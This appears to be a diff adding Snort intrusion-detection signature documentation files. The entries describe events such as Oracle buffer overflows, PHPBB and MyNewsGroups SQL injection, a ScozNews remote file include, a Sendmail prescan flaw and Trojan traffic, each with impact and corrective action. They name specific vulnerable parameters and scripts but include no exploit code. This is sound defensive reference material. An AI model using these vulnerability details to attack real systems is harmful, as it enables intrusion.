--- /dev/null
+++ b/doc/signatures/1731.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1731
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2557.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2557
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2243.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2243
+
+--
+Summary:
+This event is generated when an attempt is made to access the web cgi
+application ndcgi.exe.
+
+--
+Impact:
+Session hijacking. Unauthorized access to resources.
+
+--
+Detailed Information:
+Certain versions of Netdynamics web application present an attacker with
+the opportunity to steal session IDs and hijack user sessions from the
+information contained in the SPIDERSESSION and uniqueValue variables.
+
+--
+Affected Systems:
+	Netdynamics 4.x through 5.x
+
+--
+Attack Scenarios:
+The attacker can gain the information necessary to login using valid
+user credentials by reading the information contained in the
+SPIDERSESSION and uniqueValue variables.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/119-5.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+119-5
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+
+Impact: 
+Unknown. This may be an attempt to obfuscate an attack an evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the pre-processor http_inspect detects
+base36 encoded characters in a web request. This may be used in an
+attempt to obfuscate an attack against a webserver or to evade an IDS.
+
+--
+Affected Systems:
+	Microsoft IIS web servers (Asian)
+
+--
+Attack Scenarios: 
+An attacker need only encode a web request using base 36 encoding.
+
+-- 
+Ease of Attack: 
+Simple. Exploits exist
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/325.txt
@@ -0,0 +1,65 @@
+Rule:   
+
+--
+Sid: 325
+
+-- 
+
+Summary: 
+This is an intelligence gathering activity.
+
+-- 
+
+Impact: 
+The attacker may obtain a list of accounts existing on the target host.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use a finger command against a host with a username of "0".  A finger query against a vulnerable finger daemon may allow the attacker to obtain a list of accounts on the target system with some details for each account where present (such as time and source of the last login). 
+
+Obtaining a list of accounts might precipitate further attacks such as password guessing, email attacks and other abuse.
+
+--
+
+Attack Scenarios: 
+An attacker learns that the "sys" account exists on the system. He then proceeds to guess the password and is then able to gain remote access to the system.
+
+-- 
+
+Ease of Attack: 
+Simple, no exploit software required
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the service via firewall or TCP wrappers.
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS378
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0197
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10069%20(Finger%20zero%20at%20host
+
+--
--- /dev/null
+++ b/doc/signatures/2680.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2680
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure subindexpopulate
+. This procedure is included in
+ctxsys.driddlr.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2338.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2338
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in GtkFtpd.
+
+--
+Impact:
+Execution of arbitrary code. Possible unauthorized root access.
+
+--
+Detailed Information:
+GtkFtpd fails to perform sufficient checks on user supplied data to the
+daemon. An attacker may exploit this vulnerability to execute code of
+their choosing as the root user. This may also lead to remote root
+access to the server.
+
+--
+Affected Systems:
+	GtkFtpd 1.0.2, 1.0.3 and 1.0.4
+
+--
+Attack Scenarios:
+An attacker may use a publicly available exploit script to take
+advantage of the vulnerability.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Use scp/sftp as an alternative to ftp.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1852.txt
@@ -0,0 +1,53 @@
+Rule:  
+
+--
+Sid:
+1852
+--
+Summary:
+This event is generated when an attempt is made to access the file robots.txt directly.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+Robots.txt access is usually made by search robots for site indexing. A webmaster sometimes adds information for areas of the site that should not be indexed by the engine. This can include user directories and files and directories used in administration of the server.
+
+The information gathered from robots.txt could be used for system compromise and control of the web server.
+
+--
+Attack Scenarios:
+The attacker could retrieve robots.txt from the server, then discover the path to an unprotected administration interface for the server. The attacker can then gain control of the webserver using this interface.
+
+--
+Ease of Attack:
+Simple. An attacker needs only to find a critical file listed in robots.txt and access it through a browser.
+
+--
+False Positives:
+Many search engine's have robots that check robots.txt for information about the site. This isn't a hack attempt.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Consider using the robots Meta tag in web pages to disallow search engine indexing.
+
+Do not place any sensitive information in the root directory of the webserver. This will negate the need to add these entries to robots.txt.
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/184.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+184
+
+--
+Summary:
+Q is a Trojan Horse offering the attacker remote access to the victim 
+host. This event is generated when raw TCP packets are sent to the 
+victim server.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems.
+
+The Trojan is controlled by sending raw packets (TCP/UDP/ICMP) to the 
+victim host containing commands to be run as root.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. The 
+attacker can then choose to send raw data to the victim via TCP/UDP/ICMP
+from the broadcast address of a class C network.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Traffic originating from a broadcast address should not be allowed from 
+external sources or from internal sources to external destinations. 
+Judicious use of firewall rules is necessary.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS202
+
+--
--- /dev/null
+++ b/doc/signatures/100000842.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000842
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "PHPBB 3" application running on a webserver. Access to the file "memberlist.php" with SQL commands being passed as the "ip" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "ip" parameter in the "memberlist.php" script used by the "PHPBB 3" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPBB 3
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1548.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1548
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1785.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+
+1785
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "voyeur".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "voyeur".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000326.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000326
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "ScozNet ScozNews" application running on a webserver. Access to the file "admin_edit.php" using a remote file being passed as the "main_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "main_path" parameter in the "admin_edit.php" script used by the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2651.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2651
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases have a built-in functions NUMTOYMINTERVAL and
+NUMTODSINTERVAL that are used to convert a number to an interval
+year to month or interval day to second literal.
+
+These functions contain a programming error that may allow an
+attacker to execute a buffer overflow attack.
+
+This overflow is triggered by a long string in the second parameter
+of the function.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string as a value for this command.
+The result could permit the attacker to gain escalated privileges and
+run code of their choosing. This attack requires an attacker to logon
+to the database with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/9587
+
+Other:
+http://www.nextgenss.com/advisories/ora_numtodsinterval.txt
+http://www.nextgenss.com/advisories/ora_numtoyminterval.txt
+
+--
--- /dev/null
+++ b/doc/signatures/3459.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+3459
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This 
+may be against corporate policy. p2p clients connect to other p2p 
+clients to share files, commonly music and video files but can be 
+configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to 
+transfer company confidential information to unauthorized hosts external
+to the protected network bypassing other security measures in place.
+
+This rule detects activity from Manolito p2p client applications.
+
+--
+Affected Systems:
+	Any host using a Manolito p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000744.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000744
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "MyNewsGroups" application running on a webserver. Access to the file "tree.php" with SQL commands being passed as the "grp_id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "grp_id" parameter in the "tree.php" script used by the "MyNewsGroups" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MyNewsGroups
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1751.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1751
+
+--
+Summary:
+This event is generated when a buffer overflow attempt is made against a host using cachefsd.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code or gain remote access to the victim host.
+
+--
+Detailed Information:
+A buffer overflow condition exists in the Cache File System daemon 
+(cachefsd) on certain versions of Solaris for SPARC and x86 
+architectures.
+
+cachefsd is used to improve the performance of NFS servers.
+
+Affected Systems:
+	Solaris 5.5.1, 5.6, 5.7 and 5.8
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable cachefsd.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+AusCERT:
+http://www.auscert.org.au/render.html?it=1918
+
+CERT:
+http://www.kb.cert.org/vuls/id/161931
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0084
+
+
+Bugtraq:
+http://www.securityfocus.com/bid/4631
+
+--
--- /dev/null
+++ b/doc/signatures/2259.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2259
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/685.txt
@@ -0,0 +1,80 @@
+Rule:  
+
+--
+Sid: 
+685
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+Affected Systems:
+	Microsoft SQL Servers
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft MSDN:
+http://msdn.microsoft.com/library/en-us/tsqlref/ts_sp_addp_0awi.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1575.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1575
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2846.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2846
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure repcat_import_check
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2480.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a service via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a service
+on a system using SMB across the network.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may try to deny services to other users.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3426.txt
@@ -0,0 +1,70 @@
+Rule:
+
